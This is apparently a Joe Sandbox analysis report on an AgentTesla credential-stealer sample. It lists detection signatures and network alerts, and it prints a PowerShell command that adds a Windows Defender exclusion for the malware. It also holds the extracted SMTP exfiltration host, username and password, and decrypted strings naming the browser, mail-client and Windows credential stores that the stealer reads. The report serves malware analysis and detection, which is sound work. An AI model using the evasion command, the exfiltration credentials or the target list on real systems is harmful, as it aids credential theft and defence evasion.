Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QFEWElNtpn.exe

Overview

General Information

Sample name:QFEWElNtpn.exe
renamed because original name is a hash value
Original sample name:b612dbe8660225d074563250626237783bfdeedf5bb38d5af1e2789690787fc8.exe
Analysis ID:1567511
MD5:a945bae50ebd3643958e988d9c426760
SHA1:37bac3a7024ac33a23b5f1508458884379493007
SHA256:b612dbe8660225d074563250626237783bfdeedf5bb38d5af1e2789690787fc8
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • QFEWElNtpn.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\QFEWElNtpn.exe" MD5: A945BAE50EBD3643958E988D9C426760)
    • powershell.exe (PID: 1588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • QFEWElNtpn.exe (PID: 5424 cmdline: "C:\Users\user\Desktop\QFEWElNtpn.exe" MD5: A945BAE50EBD3643958E988D9C426760)
    • QFEWElNtpn.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\QFEWElNtpn.exe" MD5: A945BAE50EBD3643958E988D9C426760)
    • QFEWElNtpn.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\QFEWElNtpn.exe" MD5: A945BAE50EBD3643958E988D9C426760)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3358494452.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0.2.QFEWElNtpn.exe.3936bc8.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.QFEWElNtpn.exe.390dba8.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                7.2.QFEWElNtpn.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.QFEWElNtpn.exe.390dba8.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QFEWElNtpn.exe", ParentImage: C:\Users\user\Desktop\QFEWElNtpn.exe, ParentProcessId: 3492, ParentProcessName: QFEWElNtpn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", ProcessId: 1588, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QFEWElNtpn.exe", ParentImage: C:\Users\user\Desktop\QFEWElNtpn.exe, ParentProcessId: 3492, ParentProcessName: QFEWElNtpn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", ProcessId: 1588, ProcessName: powershell.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\QFEWElNtpn.exe, Initiated: true, ProcessId: 5960, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QFEWElNtpn.exe", ParentImage: C:\Users\user\Desktop\QFEWElNtpn.exe, ParentProcessId: 3492, ParentProcessName: QFEWElNtpn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe", ProcessId: 1588, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T16:30:38.529974+010020301711A Network Trojan was detected192.168.2.649710199.79.62.115587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T16:30:38.529974+010028397231Malware Command and Control Activity Detected192.168.2.649710199.79.62.115587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: QFEWElNtpn.exeAvira: detected
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                      Source: QFEWElNtpn.exeReversingLabs: Detection: 73%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: QFEWElNtpn.exeJoe Sandbox ML: detected
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: /log.tmp
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>[
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ]<br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Time:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>User Name:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>Computer Name:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>OSFullName:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>CPU:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>RAM:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IP Address:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <hr>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: New
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IP Address:
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: mail.mbarieservicesltd.com
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: saless@mbarieservicesltd.com
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: *o9H+18Q4%;M
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: false
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: appdata
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: KTvkzEc.exe
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Type
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <hr>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <b>[
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ]</b> (
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: )<br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {BACK}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {ALT+TAB}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {ALT+F4}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {TAB}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {ESC}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {Win}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {CAPSLOCK}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {KEYUP}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {KEYDOWN}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {KEYLEFT}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {KEYRIGHT}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {DEL}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {END}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {HOME}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {Insert}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {NumLock}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {PageDown}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {PageUp}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {ENTER}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F1}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F2}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F3}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F4}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F5}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F6}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F7}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F8}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F9}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F10}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F11}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {F12}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: control
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {CTRL}
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: &amp;
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: &lt;
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: &gt;
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: &quot;
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <hr>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: logins
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Secure Note
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Web Password Credential
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Credential Picker Protector
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Web Credentials
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Credentials
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Domain Certificate Credential
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Domain Password Credential
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Windows Extended Credential
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SchemaId
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UC Browser
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UCBrowser\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Login Data
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: journal
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: wow_logins
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Safari for Windows
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <array>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <dict>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <string>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </string>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <string>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </string>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: <data>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: </data>
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: -convert xml1 -s -o "
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \fixed_keychain.xml"
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Microsoft\Protect\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: credential
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: QQ Browser
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Default\EncryptedStorage
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Profile
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \EncryptedStorage
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: entries
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: category
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Password
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: str3
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: str2
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: blob0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: password_value
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: IncrediMail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PopPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\IncrediMail\Identities\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Accounts_New
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: PopPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SmtpServer
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: EmailAddress
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Eudora
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: current
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Settings
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: SavePasswordText
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Settings
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ReturnAddress
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Falkon Browser
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \falkon\profiles\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \browsedata.db
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: autofill
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ClawsMail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Claws-mail
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passkey0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: master_passphrase_salt=(.+)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \accountrc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: smtp_server
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: address
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: account
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \passwordstorerc
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: {(.*),(.*)}(.*)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Flock Browser
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: APPDATA
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \Flock\Browser\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: signons3.txt
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: DynDns
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: username=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: password=
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: https://account.dyn.com/
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: t6KzXhCh
